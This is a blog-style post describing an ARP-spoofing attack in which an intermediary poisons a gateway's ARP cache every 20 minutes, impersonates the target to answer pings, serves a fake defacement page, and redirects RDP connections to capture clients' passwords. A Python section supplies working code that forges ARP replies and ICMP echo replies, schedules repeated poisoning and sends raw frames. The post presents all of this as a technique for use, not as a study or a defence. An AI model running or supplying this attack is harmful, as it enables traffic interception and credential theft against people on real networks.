This is an unconventional approach; the path it takes is different from the usual ARP man-in-the-middle.
The principle is actually simpler.
Principle (roles):
A. Intermediary (the attacker)   B. Target   C. Client
Note:
The environment is a little special. Normally the first step is to obtain the other party's MAC, but here only the gateway's MAC can be obtained; the target's MAC cannot be learned.
That does not matter. To test whether the environment meets the requirements, I sent a single spoofed ARP reply to the gateway. After that, B (the target) could no longer reach the gateway, and it took 20 minutes before the connection recovered.
This tells us two things: the gateway does not have static ARP binding (ARP spoofing works, and one spoofed entry redirects the target's traffic for 20 minutes), and the gateway's ARP table is flushed on a 20-minute cycle.
So the refresh interval is 20 minutes. The question is: how do we handle the data without knowing the target's MAC?
A very bold experiment:
1. Send the spoofed ARP reply to the gateway once every 20 minutes, so the entry never expires back to the real target.
2. Answer ICMP ourselves, so that a ping to the target still gets replies.
3. Answer the TCP three-way handshake ourselves and fake an HTTP response, so the site appears to return a defacement ("black") page.
4. Redirect C --> B:3389 to C --> A:3389 (the RDP port), and record the password that C types in.
5. Once a password has been captured: stop the port redirection, stop the fake services, and stop sending ARP, then wait for the gateway to refresh its ARP cache. Until the gateway refreshes, neither side can log on. During this long wait, run ping -t against the target IP and watch for it to come back online.
6. After that it comes down to luck.
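As an added illustration (this is not code from the original post), the following Python builds the two frames steps 1 and 2 depend on: the unsolicited ARP reply that rewrites the gateway's entry for B, and the ICMP echo reply that A must synthesize because it has no way to forward the ping to B. All IP and MAC addresses are constructed placeholders; the raw-socket sender assumes Linux (AF_PACKET) and an interface name, and the 20-minute interval is the timeout observed in the post.

```python
import socket
import struct
import time
from typing import Callable, Optional

# Constructed placeholder addresses for the three roles in the post
# (A intermediary, B target, gateway); replace with the real LAN values.
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:55"   # the only MAC the post says can be learned
TARGET_IP = "192.168.1.20"          # B; its MAC is never learned
ATTACKER_MAC = "de:ad:be:ef:00:01"  # A

ETH_P_IP, ETH_P_ARP = 0x0800, 0x0806
ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; returns 0 when run over a
    header whose checksum field is already correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_arp_reply(sender_ip: str, sender_mac: str,
                    target_ip: str, target_mac: str) -> bytes:
    """Ethernet frame carrying an unsolicited ARP reply 'sender_ip is-at
    sender_mac'. With sender_ip = B and sender_mac = A, sent to the gateway,
    this is the poison: the gateway now delivers B's traffic to A."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, ETH_P_IP, 6, 4, 2)  # Ethernet, IPv4, opcode 2 = reply
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def build_icmp_echo_request(src_mac, dst_mac, src_ip, dst_ip,
                            ident=1, seq=1, payload=b"ping") -> bytes:
    """Ordinary echo request; used here only to construct sample input."""
    icmp = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64,
                     socket.IPPROTO_ICMP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_IP)
    return eth + ip + icmp


def build_icmp_echo_reply(frame: bytes) -> Optional[bytes]:
    """Step 2 of the post: A cannot forward the ping to B, so it answers
    as B. Returns the reply frame, or None if the input is not an echo request."""
    if len(frame) < 14 + 20 + 8 or frame[12:14] != struct.pack("!H", ETH_P_IP):
        return None
    ihl = (frame[14] & 0x0F) * 4
    ip_hdr = bytearray(frame[14:14 + ihl])
    icmp = bytearray(frame[14 + ihl:])
    if ip_hdr[9] != socket.IPPROTO_ICMP or icmp[0] != ICMP_ECHO_REQUEST:
        return None
    # Swap addresses, reset TTL, recompute the IP header checksum.
    ip_hdr[12:16], ip_hdr[16:20] = ip_hdr[16:20], ip_hdr[12:16]
    ip_hdr[8] = 64
    ip_hdr[10:12] = b"\x00\x00"
    ip_hdr[10:12] = struct.pack("!H", checksum(bytes(ip_hdr)))
    # Flip the type to echo reply; id, sequence and payload are echoed unchanged.
    icmp[0] = ICMP_ECHO_REPLY
    icmp[2:4] = b"\x00\x00"
    icmp[2:4] = struct.pack("!H", checksum(bytes(icmp)))
    eth = frame[6:12] + frame[0:6] + struct.pack("!H", ETH_P_IP)  # back to the sender
    return eth + bytes(ip_hdr) + bytes(icmp)


def poison_schedule(send: Callable[[bytes], None], interval_s: float = 20 * 60,
                    rounds: Optional[int] = None, sleep=time.sleep) -> int:
    """Step 1: re-send the poisoned reply once per gateway ARP timeout
    (20 minutes in the post). Returns the number of frames sent."""
    frame = build_arp_reply(TARGET_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC)
    sent = 0
    while rounds is None or sent < rounds:
        send(frame)
        sent += 1
        if rounds is None or sent < rounds:
            sleep(interval_s)
    return sent


def raw_send(frame: bytes, iface: str = "eth0") -> None:
    """Linux-only sender (AF_PACKET needs CAP_NET_RAW); interface name is assumed."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)
```

In use, `poison_schedule(raw_send)` keeps the gateway's entry for B pointing at A, and a sniffer loop on A feeds each captured frame through `build_icmp_echo_reply` and sends back whatever it returns. The TCP handshake and fake HTTP page of step 3 follow the same pattern (swap addresses, craft the SYN-ACK, then the response) but need sequence-number tracking, so they are not shown here.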
From the ethereal Baidu Space